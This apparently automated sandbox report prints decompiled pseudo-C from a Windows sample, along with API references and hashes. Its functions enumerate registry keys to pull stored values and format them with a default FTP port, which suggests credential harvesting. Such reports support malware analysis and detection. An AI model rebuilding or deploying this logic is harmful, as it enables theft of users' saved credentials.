    						_a8[_t84] = _t71;
    						_t84 = _t84 + 1;
    						_v8 = _v8 + 1;
    					} while (_t84 < _v16);
    					_t87 = _v16;
    				}
    				if((_a4 & 0x00000004) == 0 || _t87 == 0) {
    					_t85 = _a8;
    				} else {
    					_t85 = _a8;
    					_t59 = _t85 + _t87 * 2 - 2;
    					while( *_t59 == 0x20) {
    						_t59 = _t59 - 2;
    						_t87 = _t87 - 1;
    						if(_t87 != 0) {
    							continue;
    						} else {
    						}
    						goto L24;
    					}
    				}
    				L24:
    				_t57 = 0;
    				_t85[_t87] = 0;
    				if((_a4 & 0x00000002) != 0) {
    					_t57 = CharUpperW( *_t85 & 0x0000ffff);
    					 *_t85 = 0;
    				}
    				return _t57;
    			}





















    APIs
      • Part of subcall function 00412CFA: GetTickCount.KERNEL32 ref: 00412CFA
    • CharUpperW.USER32(00000000,?,.exe,00000000,00000000), ref: 00415E61
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CharCountTickUpper
    • String ID: .exe$aeiouy$bcdfghklmnpqrstvwxz
    • API String ID: 2674899715-3410450461
    • Opcode ID: beaa0367e3124e3ec47e279d5ab8991111d62891ced75b9e5f752712e0ba679c
    • Instruction ID: dd3529ccd459f53c7a53bdf670feb9bf0a6af38c25f2a78d6b3ef3f54e56a681
    • Opcode Fuzzy Hash: beaa0367e3124e3ec47e279d5ab8991111d62891ced75b9e5f752712e0ba679c
    • Instruction Fuzzy Hash: 52316BB6D00A09DBCB109FA9C5453EEBBB4FF84304F54846BD851AB240D37C9B818BD9
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E0040DD91(void* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v52;
    				char _v76;
    				char _v116;
    				char _v636;
    				short _v1156;
    				void* __edi;
    				void* __esi;
    				void* _t28;
    				void* _t30;
    				void* _t35;
    				void* _t39;
    				char* _t42;
    				void* _t52;
    				WCHAR* _t55;
    				char* _t60;
    				signed int _t61;
    				void* _t62;
    				intOrPtr _t70;
    
    				_t54 = __edx;
    				_t52 = __ecx;
    				E00411A74( &_v12,  &_v12, 0, 8);
    				_t28 = 0x60;
    				E00419DD3(_t28,  &_v116);
    				_t30 = 0x61;
    				E00419DD3(_t30,  &_v52);
    				_t55 =  &_v636;
    				_t35 = E00415AE5(0x80000002, _t52, _t55,  &_v116,  &_v52, 0x104);
    				if(_t35 != 0xffffffff) {
    					_t65 = _t35;
    					if(_t35 > 0) {
    						ExpandEnvironmentStringsW(_t55,  &_v1156, 0x104);
    						E0040DB49(_t65,  &_v1156,  &_v12);
    					}
    				}
    				if(_v8 != 0) {
    					L9:
    					if(_t70 <= 0) {
    						return E004119C1(_v12);
    					}
    					_push(0xcb);
    					return E0040C9F4(_t54, _v12, 0x63);
    				} else {
    					_t60 =  &_v76;
    					_t39 = 0x62;
    					E00419DD3(_t39, _t60);
    					_v28 = 0x23;
    					_v24 = 0x1a;
    					_v20 = 0x26;
    					_v16 = _t60;
    					_t61 = 0;
    					do {
    						_t42 =  &_v636;
    						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
    						_t68 = _t42;
    						if(_t42 == 0) {
    							_t54 =  &_v16;
    							E004170EA( &_v636,  &_v16, _t68, 1, 2, E0040DBA3,  &_v12, 0, 0, 0);
    						}
    						_t61 = _t61 + 1;
    					} while (_t61 < 3);
    					_t70 = _v8;
    					goto L9;
    				}
    			}




























    APIs
      • Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0040DDF3
    • SHGetFolderPathW.SHELL32(00000000,00000023,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0040DE43
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: EnvironmentExpandFolderOpenPathStrings
    • String ID: #$&
    • API String ID: 1994525040-3870246384
    • Opcode ID: adc5832fa4841db1558202c5a8969cf429502c28623afd93d6ee9f9138e44bd7
    • Instruction ID: de998fd12ecfd6a1462ecb3c26c5d0b4a3347104c184a846e60a16bfa850efe8
    • Opcode Fuzzy Hash: adc5832fa4841db1558202c5a8969cf429502c28623afd93d6ee9f9138e44bd7
    • Instruction Fuzzy Hash: A9314FB2D00218AADF10ABE0DC99EEFB77CEB04308F14456BF615F7191D6785E898B94
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 85%
    			E0040E641(void* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				char _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				char _v44;
    				char _v68;
    				char _v120;
    				char _v644;
    				short _v1164;
    				void* __edi;
    				void* __esi;
    				void* _t28;
    				void* _t30;
    				void* _t35;
    				void* _t39;
    				char* _t42;
    				void* _t52;
    				WCHAR* _t55;
    				char* _t60;
    				signed int _t61;
    				void* _t62;
    				intOrPtr _t70;
    
    				_t54 = __edx;
    				_t52 = __ecx;
    				E00411A74( &_v12,  &_v12, 0, 8);
    				_t28 = 0x77;
    				E00419DD3(_t28,  &_v120);
    				_t30 = 0x78;
    				E00419DD3(_t30,  &_v44);
    				_t55 =  &_v644;
    				_t35 = E00415AE5(0x80000001, _t52, _t55,  &_v120,  &_v44, 0x104);
    				if(_t35 != 0xffffffff) {
    					_t65 = _t35;
    					if(_t35 > 0) {
    						ExpandEnvironmentStringsW(_t55,  &_v1164, 0x104);
    						E0040E3E4(_t65,  &_v1164,  &_v12);
    					}
    				}
    				if(_v8 != 0) {
    					L9:
    					if(_t70 <= 0) {
    						return E004119C1(_v12);
    					}
    					_push(0xcb);
    					return E0040C9F4(_t54, _v12, 0x7a);
    				} else {
    					_t60 =  &_v68;
    					_t39 = 0x79;
    					E00419DD3(_t39, _t60);
    					_v28 = 0x1a;
    					_v24 = 0x26;
    					_v20 = 0x23;
    					_v16 = _t60;
    					_t61 = 0;
    					do {
    						_t42 =  &_v644;
    						__imp__SHGetFolderPathW(0,  *((intOrPtr*)(_t62 + _t61 * 4 - 0x18)), 0, 0, _t42);
    						_t68 = _t42;
    						if(_t42 == 0) {
    							_t54 =  &_v16;
    							E004170EA( &_v644,  &_v16, _t68, 1, 2, E0040E41C,  &_v12, 0, 0, 0);
    						}
    						_t61 = _t61 + 1;
    					} while (_t61 < 3);
    					_t70 = _v8;
    					goto L9;
    				}
    			}




























    APIs
      • Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0040E6A3
    • SHGetFolderPathW.SHELL32(00000000,0000001A,00000000,00000000,?,?,?,00000104,?,00000000,00000008,?,00000000,00000001), ref: 0040E6F3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: EnvironmentExpandFolderOpenPathStrings
    • String ID: #$&
    • API String ID: 1994525040-3870246384
    • Opcode ID: 83aadc7df684594267f1f05e2fce5273f0e8e628678e53fd479ed1bde99f2cc2
    • Instruction ID: 9b0cfd9cef65b5984fc31b85bbe480535c8a49090ec1e8169855d4329bb318ab
    • Opcode Fuzzy Hash: 83aadc7df684594267f1f05e2fce5273f0e8e628678e53fd479ed1bde99f2cc2
    • Instruction Fuzzy Hash: 0F3173B2D00218AADF109BA19C85EDFB77CEB44308F10497BF601F71C1DA785E858B95
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0040666E(void* __ecx, WCHAR* __edi, char _a4) {
    				char _v108;
    				char _v158;
    				char _v178;
    				char _v198;
    				char _v596;
    				void* __esi;
    				signed int _t12;
    				int _t14;
    				WCHAR* _t16;
    				char* _t18;
    				WCHAR* _t19;
    
    				_t19 = __edi;
    				 *__edi = 0;
    				E00406619(__ecx,  &_v596);
    				_t2 =  &_a4; // 0x405e38
    				_t12 =  *_t2;
    				if(_t12 == 0) {
    					L6:
    					_t18 =  &_v178;
    					goto L7;
    				} else {
    					_t12 = _t12 - 1;
    					if(_t12 == 0) {
    						_t18 =  &_v198;
    						L7:
    						_t16 = 0x422590;
    						goto L8;
    					} else {
    						_t12 = _t12 - 1;
    						if(_t12 == 0) {
    							goto L6;
    						} else {
    							_t14 = _t12 - 1;
    							if(_t14 == 0) {
    								_t16 = L"SOFTWARE\\Microsoft";
    								_t18 =  &_v158;
    								L8:
    								_t21 =  &_v108;
    								_t14 = E00411BCC(_t12 | 0xffffffff, _t18,  &_v108, 0, 0x32);
    								if(_t14 != 0) {
    									_t14 = E00417246(_t21, _t19, _t16);
    									if(_t14 == 0) {
    										L12:
    										_t14 = 0;
    										 *_t19 = 0;
    									} else {
    										if(_a4 == 0) {
    											_t14 = PathRenameExtensionW(_t19, L".dat");
    											if(_t14 == 0) {
    												goto L12;
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				}
    				return _t14;
    			}















    APIs
    • PathRenameExtensionW.SHLWAPI(?,.dat,?,00422590,00000000,00000032,?,77A19EB0,00000000), ref: 004066E7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: ExtensionPathRename
    • String ID: .dat$8^@$SOFTWARE\Microsoft
    • API String ID: 3337224433-3873279264
    • Opcode ID: 65ba8bf1092b7e803ae660c3e55856e6de0ba63ad58867742bb5ef8d48e020f9
    • Instruction ID: 404c38e0d0a24e5c798407f6c772577cd3f37ba950b1ec48a16a6aaecc3b5e60
    • Opcode Fuzzy Hash: 65ba8bf1092b7e803ae660c3e55856e6de0ba63ad58867742bb5ef8d48e020f9
    • Instruction Fuzzy Hash: 5001D83060021596DB209B64CD41BABB76C9F10744F41087BE916F32C1EB7DDEA0C65D
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 86%
    			E00416DC6(WCHAR* _a4) {
    				short _v524;
    				char _v1044;
    				void* __edi;
    				void* _t11;
    				void* _t19;
    				void* _t20;
    
    				if(GetTempPathW(0xf6,  &_v524) - 1 > 0xf5) {
    					L6:
    					return 0;
    				}
    				_t19 = 0;
    				while(1) {
    					_push(E00412CFA());
    					_push(L"tmp");
    					_t18 =  &_v1044;
    					_t11 = E004126B4(_t10, 0x104,  &_v1044, L"%s%08x");
    					_t20 = _t20 + 0xc;
    					if(_t11 == 0xffffffff) {
    						goto L6;
    					}
    					if(E00417246(_t18, _a4,  &_v524) == 0 || CreateDirectoryW(_a4, 0) == 0) {
    						_t19 = _t19 + 1;
    						if(_t19 < 0x64) {
    							continue;
    						}
    						goto L6;
    					} else {
    						return 1;
    					}
    				}
    				goto L6;
    			}

    APIs
    • GetTempPathW.KERNEL32(000000F6,?,00000000,?), ref: 00416DDD
      • Part of subcall function 00412CFA: GetTickCount.KERNEL32 ref: 00412CFA
      • Part of subcall function 00417246: PathCombineW.SHLWAPI(00405D8B,00405D8B,?,00405D8B,?,?), ref: 00417265
    • CreateDirectoryW.KERNEL32(?,00000000,?,?), ref: 00416E2F
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Path$CombineCountCreateDirectoryTempTick
    • String ID: %s%08x$tmp
    • API String ID: 1218007593-1196434543
    • Opcode ID: edd561af6a843b1339d7679a902f7c762362cff48795dc9e72f655cd8cbf19b2
    • Instruction ID: 4b127c912a2393b1ddf5e7c1c55cff86fe39688baeb91cacfc36c6706d6fe6ad
    • Opcode Fuzzy Hash: edd561af6a843b1339d7679a902f7c762362cff48795dc9e72f655cd8cbf19b2
    • Instruction Fuzzy Hash: 7EF0447A20031466DE206A28DD05BEF77A8DB10310F004272FE56E21E0D678CED6869C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00416FC8(WCHAR* _a4) {
    				signed int _t4;
    				short _t9;
    				signed short _t10;
    				WCHAR* _t11;
    				WCHAR* _t12;
    				int _t18;
    
    				_t12 = _a4;
    				_t9 = 0;
    				_t11 = PathSkipRootW(_t12);
    				if(_t11 == 0) {
    					_t11 = _t12;
    				}
    				while(1) {
    					_t4 =  *_t11 & 0x0000ffff;
    					if(_t4 == 0x5c || _t4 == 0x2f || _t4 == 0) {
    						goto L5;
    					}
    					L11:
    					_t11 =  &(_t11[1]);
    					continue;
    					L5:
    					_t10 = _t4;
    					 *_t11 = 0;
    					if(GetFileAttributesW(_t12) == 0xffffffff) {
    						_t18 = CreateDirectoryW(_t12, 0);
    					}
    					if(_t18 == 0) {
    						L13:
    						return _t9;
    					} else {
    						if(_t10 == 0) {
    							_t9 = 1;
    							goto L13;
    						}
    						 *_t11 = _t10;
    						goto L11;
    					}
    				}
    			}

    APIs
    • PathSkipRootW.SHLWAPI(?,.exe,00000000,?,00000000,0041CE59,?,?,?,?,?), ref: 00416FD3
    • GetFileAttributesW.KERNEL32(?,?,00000000,0041CE59,?,?,?,?,?), ref: 00416FFB
    • CreateDirectoryW.KERNEL32(?,00000000,?,00000000,0041CE59,?,?,?,?,?), ref: 00417009
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AttributesCreateDirectoryFilePathRootSkip
    • String ID: .exe
    • API String ID: 4231520044-4119554291
    • Opcode ID: 76dfddc1a029c9a74099b6bda70c74c4ab68234f9fa43a7f345e042a9f995628
    • Instruction ID: 389cddabf3638a5cceb577c84acea22344677a9bfabe09dbb732a5faa5b1e13a
    • Opcode Fuzzy Hash: 76dfddc1a029c9a74099b6bda70c74c4ab68234f9fa43a7f345e042a9f995628
    • Instruction Fuzzy Hash: 1BF04C3714530056D6300E2A6C04AE7B7A9DE157A0B66493BFD91D3350D739DCC2D26C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E004131C8(void* __ecx) {
    				signed int _v8;
    				struct HINSTANCE__* _t7;
    
    				_v8 = _v8 & 0x00000000;
    				_t7 = GetModuleHandleW(L"kernel32.dll");
    				if(_t7 == 0) {
    					L4:
    					return _t7 & 0xffffff00 | _v8 != 0x00000000;
    				} else {
    					_t7 = GetProcAddress(_t7, "IsWow64Process");
    					if(_t7 == 0) {
    						goto L4;
    					} else {
    						_t7 = _t7->i(0xffffffff,  &_v8);
    						if(_t7 != 0) {
    							goto L4;
    						} else {
    							return 0;
    						}
    					}
    				}
    			}

    APIs
    • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00405C01,00000000,00406128), ref: 004131D5
    • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004131E5
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: AddressHandleModuleProc
    • String ID: IsWow64Process$kernel32.dll
    • API String ID: 1646373207-3024904723
    • Opcode ID: 78c6ec8dd5f8c19e8780382f3605e14fb917f9651ddd33c77cabacaefac4c6b1
    • Instruction ID: 2f59b1bf19ed58ff7e5604f6e410fa3e2b8360f9c30eccc8fe19d67955a0b3e1
    • Opcode Fuzzy Hash: 78c6ec8dd5f8c19e8780382f3605e14fb917f9651ddd33c77cabacaefac4c6b1
    • Instruction Fuzzy Hash: FAE04870200205B7DF009FA59D07B9B779C5B01796F1402A9B011F21D0EAF8DB4C955C
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041B924(intOrPtr _a4, intOrPtr _a12) {
    				void* __esi;
    				void* _t6;
    				signed int _t7;
    
    				if(_a12 == 0x64 || _a12 == 0x33) {
    					EnterCriticalSection(0x423df4);
    					_t7 = E0041B2EB(_a4);
    					if(_t7 != 0xffffffff) {
    						_t7 = SetEvent( *(_t7 * 0x24 +  *0x423d8c + 4));
    					}
    					LeaveCriticalSection(0x423df4);
    					return _t7;
    				}
    				return _t6;
    			}

    APIs
    • EnterCriticalSection.KERNEL32(00423DF4), ref: 0041B93A
    • SetEvent.KERNEL32(?), ref: 0041B95B
    • LeaveCriticalSection.KERNEL32(00423DF4), ref: 0041B962
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CriticalSection$EnterEventLeave
    • String ID: 3
    • API String ID: 3094578987-1842515611
    • Opcode ID: 472c320ed590743a78bd2ae0bb93211018dc1e2a304350d54b9522dbb2e214e9
    • Instruction ID: 65408f406772979773c06b25283888ead931e93f8e655ba5db33f56392e03ec9
    • Opcode Fuzzy Hash: 472c320ed590743a78bd2ae0bb93211018dc1e2a304350d54b9522dbb2e214e9
    • Instruction Fuzzy Hash: 6EE06D31204110ABC7105B26AD4889ABB74EA96326B04C57FF616A2170C738C843CA99
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 93%
    			E0040EE10(char* __ecx, void* __edx, void* __eflags) {
    				void* _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				int _v20;
    				int _v24;
    				intOrPtr _v28;
    				char _v32;
    				char* _v36;
    				intOrPtr _v40;
    				intOrPtr _v44;
    				intOrPtr _v48;
    				char _v68;
    				char _v88;
    				char _v108;
    				char _v132;
    				char _v172;
    				short _v260;
    				short _v780;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t65;
    				intOrPtr _t92;
    				int _t104;
    				void* _t110;
    				intOrPtr _t112;
    				void* _t115;
    				int _t120;
    				void* _t125;
    				void* _t132;
    				void* _t135;
    				void* _t136;
    
    				_t119 = __edx;
    				_t118 = __ecx;
    				_t120 = 0;
    				E00411A74( &_v32,  &_v32, 0, 8);
    				_t65 = E00411991(0xc1c);
    				_v16 = _t65;
    				if(_t65 == 0) {
    					L22:
    					if(_v28 <= _t120) {
    						return E004119C1(_v32);
    					}
    					return E0040C9F4(_t119, _v32, 0xcb);
    				} else {
    					_v36 = _t65 + 0x3fc;
    					_v48 = 0x80000001;
    					_v44 = 0x80000002;
    					E00419DD3(0x8a,  &_v260);
    					E00419DD3(0x8b,  &_v88);
    					E00419DD3(0x8c,  &_v132);
    					E00419DD3(0x8d,  &_v68);
    					E00419DD3(0x8e,  &_v108);
    					_v12 = 0;
    					do {
    						if(RegOpenKeyExW( *(_t135 + _v12 * 4 - 0x2c),  &_v260, _t120, 8,  &_v8) != 0) {
    							goto L20;
    						}
    						_v24 = _t120;
    						_v20 = 0x104;
    						if(RegEnumKeyExW(_v8, _t120,  &_v780,  &_v20, _t120, _t120, _t120, _t120) != 0) {
    							L19:
    							RegCloseKey(_v8);
    							goto L20;
    						} else {
    							goto L4;
    						}
    						L17:
    						_v20 = 0x104;
    						if(RegEnumKeyExW(_v8, _v24,  &_v780,  &_v20, 0, 0, 0, 0) == 0) {
    							L4:
    							_t122 = _v16;
    							_v24 = _v24 + 1;
    							_t92 = E00415AE5(_v8, _t118, _v16,  &_v780,  &_v88, 0xff);
    							_v40 = _t92;
    							if(_t92 != 0xffffffff && _t92 != 0) {
    								_t132 = E00415AE5(_v8, _t118, _t122 + 0x1fe,  &_v780,  &_v68, 0xff);
    								if(_t132 != 0xffffffff && _t132 != 0) {
    									_t124 = _v36;
    									_t104 = E00415AE5(_v8, _t118, _v36,  &_v780,  &_v108, 0xff);
    									_v20 = _t104;
    									if(_t104 != 0xffffffff && _t104 != 0 && E0040ED56(_t119, _t124, _t132 + _v40) > 0) {
    										_t125 = E00415B9B(_v8, _t118,  &_v780,  &_v132);
    										if(_t125 < 1 || _t125 > 0xffff) {
    											_t125 = 0x15;
    										}
    										_t134 =  &_v172;
    										_t110 = 0x55;
    										E00419DD3(_t110,  &_v172);
    										_t112 = _v16;
    										_t118 = _v36;
    										_push(_t125);
    										_push(_t112);
    										_push(_t118);
    										_push(_t112 + 0x1fe);
    										_t119 = 0x311;
    										_t126 = _t118 + 0x1fe;
    										_t115 = E004126B4(_t134, 0x311, _t118 + 0x1fe, _t134);
    										_t136 = _t136 + 0x14;
    										if(_t115 > 0) {
    											_t118 =  &_v32;
    											if(E00411DB5(_t115,  &_v32, _t126) != 0) {
    												_v28 = _v28 + 1;
    											}
    										}
    									}
    								}
    							}
    							goto L17;
    						} else {
    							_t120 = 0;
    							goto L19;
    						}
    						L20:
    						_v12 = _v12 + 1;
    					} while (_v12 < 2);
    					E004119C1(_v16);
    					goto L22;
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 0040EEB6
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 0040EEE1
    • RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 0040F017
      • Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 0040F004
      • Part of subcall function 00415AE5: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041D971,?,?,00000104), ref: 00415B7B
      • Part of subcall function 00415B9B: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041B4FB,?,?), ref: 00415BB3
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: e854cd7dd078dc7023054acee4611ea1fd93a56925d0228768620ea15a9ba26a
    • Instruction ID: 0d02f69a53c4cc692e7303d5cd6b5153c7c2398ac0ea19bec22be19005736b60
    • Opcode Fuzzy Hash: e854cd7dd078dc7023054acee4611ea1fd93a56925d0228768620ea15a9ba26a
    • Instruction Fuzzy Hash: 46514CB2900119ABDB20DBA5CD45AEFB7BCEF48304F100576F951F3291DB38AE858B64
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E0040F3A4(char* __ecx, void* __eflags) {
    				void* _v8;
    				int _v12;
    				intOrPtr _v16;
    				int* _v20;
    				intOrPtr _v24;
    				char _v28;
    				char* _v32;
    				char _v40;
    				char _v52;
    				char _v64;
    				char _v76;
    				char _v116;
    				short _v180;
    				short _v700;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t55;
    				int _t81;
    				int _t89;
    				int _t93;
    				void* _t99;
    				intOrPtr _t101;
    				void* _t104;
    				int* _t109;
    				char* _t113;
    				void* _t114;
    				void* _t122;
    
    				_t107 = __ecx;
    				_t109 = 0;
    				E00411A74( &_v28,  &_v28, 0, 8);
    				_t55 = E00411991(0xc1c);
    				_v16 = _t55;
    				if(_t55 == 0) {
    					return _t55;
    				}
    				_v32 = _t55 + 0x3fc;
    				E00419DD3(0x97,  &_v180);
    				E00419DD3(0x98,  &_v64);
    				E00419DD3(0x99,  &_v76);
    				E00419DD3(0x9a,  &_v52);
    				E00419DD3(0x9b,  &_v40);
    				if(RegOpenKeyExW(0x80000001,  &_v180, 0, 8,  &_v8) != 0) {
    					L20:
    					E004119C1(_v16);
    					if(_v24 <= _t109) {
    						return E004119C1(_v28);
    					}
    					return E0040C9F4(0x311, _v28, 0xcb);
    				}
    				_v20 = 0;
    				_v12 = 0x104;
    				if(RegEnumKeyExW(_v8, 0,  &_v700,  &_v12, 0, 0, 0, 0) != 0) {
    					L19:
    					RegCloseKey(_v8);
    					goto L20;
    				} else {
    					do {
    						_t111 = _v16;
    						_v20 = _v20 + 1;
    						_t81 = E00415AE5(_v8, _t107, _v16,  &_v700,  &_v64, 0xff);
    						_v12 = _t81;
    						if(_t81 != 0xffffffff && _t81 != 0) {
    							_t89 = E00415AE5(_v8, _t107, _t111 + 0x1fe,  &_v700,  &_v52, 0xff);
    							_v12 = _t89;
    							if(_t89 != 0xffffffff && _t89 != 0) {
    								_t113 = _v32;
    								_t93 = E00415AE5(_v8, _t107, _t113,  &_v700,  &_v40, 0xff);
    								_v12 = _t93;
    								if(_t93 != 0xffffffff && _t93 != 0) {
    									_t107 = _t113;
    									if(E00412510(_t113) > 0) {
    										_t114 = E00415B9B(_v8, _t107,  &_v700,  &_v76);
    										if(_t114 < 1 || _t114 > 0xffff) {
    											_t114 = 0x15;
    										}
    										_t121 =  &_v116;
    										_t99 = 0x55;
    										E00419DD3(_t99,  &_v116);
    										_t101 = _v16;
    										_t107 = _v32;
    										_push(_t114);
    										_push(_t101);
    										_push(_t107);
    										_push(_t101 + 0x1fe);
    										_t115 = _t107 + 0x1fe;
    										_t104 = E004126B4(_t121, 0x311, _t107 + 0x1fe, _t121);
    										_t122 = _t122 + 0x14;
    										if(_t104 > 0) {
    											_t107 =  &_v28;
    											if(E00411DB5(_t104,  &_v28, _t115) != 0) {
    												_v24 = _v24 + 1;
    											}
    										}
    									}
    								}
    							}
    						}
    						_v12 = 0x104;
    					} while (RegEnumKeyExW(_v8, _v20,  &_v700,  &_v12, 0, 0, 0, 0) == 0);
    					_t109 = 0;
    					goto L19;
    				}
    			}

    APIs
    • RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000008,?,?,00000000,00000008,?,00000000,00000001), ref: 0040F432
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,00000001), ref: 0040F45D
    • RegCloseKey.ADVAPI32(?,?,00000000,00000001), ref: 0040F594
      • Part of subcall function 00415AE5: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D971,?,?,00000104,.exe,00000000), ref: 00415AFA
    • RegEnumKeyExW.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000,?,?,000000FF,?,00000000,00000001), ref: 0040F581
      • Part of subcall function 00415AE5: ExpandEnvironmentStringsW.KERNEL32(00000000,?,?,?,?,?,0041D971,?,?,00000104), ref: 00415B7B
      • Part of subcall function 00415B9B: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?,?,?,?,0041B4FB,?,?), ref: 00415BB3
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Open$Enum$CloseEnvironmentExpandStrings
    • String ID:
    • API String ID: 2343474859-0
    • Opcode ID: 51678386fd146b88d8c0e43e42052caf0dec5df9ff339fb63b05230916cd8118
    • Instruction ID: 8a1d7e72c5b4c3ada0ad21d32bc5af5037fc9f318339c7f5677f9063e04565c1
